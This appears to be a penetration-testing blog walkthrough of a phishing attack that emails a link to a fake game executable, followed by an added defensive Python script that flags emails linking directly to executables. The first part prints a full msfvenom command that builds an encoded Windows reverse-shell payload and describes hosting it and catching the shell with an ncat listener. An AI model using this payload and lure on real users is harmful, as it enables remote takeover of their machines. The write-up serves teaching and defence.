The use of binaries has decreased a great deal, but this is still a good example of how users download EXE files and hand access to attackers.
This is an old form of attack, not widely used at the time of writing, but it has been effective in the past.
I will demonstrate a simple, chatty email that contains a link to download the executable; that way it evades the email provider's security measures, which scan attached binaries but not a link. Clicking the link simply gives the user a prompt to download or run the binary.
I will create a simple binary using the msfvenom tool; the following is the command I used. This tool is very well known in the industry, so the chance of detection is incredibly high; obfuscation, packing and other methods may be used for evasion. The resulting file can also be considered an attachment.
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST= LPORT=1337 --encoder x64/xor --iterations 9 --format exe --out game.exe
We need to host our binary on a server we control so it can be properly delivered. As this is a simple demo, I used Python to host an HTTP server and sent the user a link that immediately downloads the file to their machine.
A simple email asks the user to download this new game so we can play online. The user views the mail.
Once the link is clicked, the user is prompted to Run or Save; for these purposes we go straight to Run the EXE file.
The file gets executed.
On our attacking machine we set up a listener using ncat (this is a personal choice; there are many other options available).
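The whole lure above works because the binary is fetched by a link rather than attached, so an attachment scanner never sees it. The following is an added defensive example, not code from the original write-up: a small mail-gateway style check that parses a message and flags links that point straight at an executable, are hosted on a bare IP address, or use a non-standard port, all traits of the demo link. The sample email, the address 203.0.113.10 (RFC 5737 documentation space) and the extension list are constructed for the example.

```python
"""Flag e-mails that carry a direct link to an executable download.

Added defensive example (not part of the original write-up). The lure in
the write-up evades attachment scanning by linking to the binary instead of
attaching it, so this check inspects the links themselves. The sample
message below is constructed for the demo.
"""
import re
from email import message_from_string
from urllib.parse import urlparse

# Extensions a user is typically prompted to "Run or Save" for (constructed list).
EXECUTABLE_EXTENSIONS = {".exe", ".msi", ".scr", ".bat", ".cmd", ".ps1", ".js", ".vbs", ".hta"}

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

# Constructed sample in the spirit of the "new game" lure.
# 203.0.113.10 is RFC 5737 documentation address space, not a real host.
SAMPLE_EMAIL = """\
From: friend@example.net
To: victim@example.org
Subject: New game, play online with me tonight
Content-Type: text/plain; charset="utf-8"

Hey, grab the game from http://203.0.113.10:8000/game.exe and we can play.
Release notes are at https://www.example.org/notes.html
"""


def extract_urls(raw_message: str) -> list[str]:
    """Return every http(s) URL found in the text parts of a raw RFC 822 message."""
    msg = message_from_string(raw_message)
    urls: list[str] = []
    for part in msg.walk():  # a non-multipart message yields itself
        if part.get_content_type() not in ("text/plain", "text/html"):
            continue
        payload = part.get_payload(decode=True)  # bytes, transfer-encoding removed
        text = payload.decode(part.get_content_charset() or "utf-8", errors="replace")
        urls.extend(URL_RE.findall(text))
    return urls


def classify_url(url: str) -> list[str]:
    """Return the reasons a URL looks like a direct executable lure (empty if none)."""
    parsed = urlparse(url)
    reasons: list[str] = []
    path = parsed.path.lower()
    if any(path.endswith(ext) for ext in EXECUTABLE_EXTENSIONS):
        reasons.append("direct executable download")
    if IPV4_RE.match(parsed.hostname or ""):
        reasons.append("bare IP address instead of a domain")
    if parsed.port and parsed.port not in (80, 443):
        reasons.append(f"non-standard port {parsed.port}")
    # Plain HTTP alone is too common to flag; only note it on an already suspicious link.
    if parsed.scheme == "http" and reasons:
        reasons.append("served over plain HTTP")
    return reasons


def scan_email(raw_message: str) -> dict[str, list[str]]:
    """Map each suspicious URL in the message to the reasons it was flagged."""
    findings: dict[str, list[str]] = {}
    for url in extract_urls(raw_message):
        reasons = classify_url(url)
        if reasons:
            findings[url] = reasons
    return findings


if __name__ == "__main__":
    for flagged, why in scan_email(SAMPLE_EMAIL).items():
        print(f"FLAG {flagged}: {', '.join(why)}")
```

Run as a script, it flags only the game.exe link (four reasons) and leaves the release-notes link alone. In a real gateway the same `classify_url` check would also be applied after following redirects, since a lure can hide the `.exe` behind a shortener; that step is omitted here to keep the example offline.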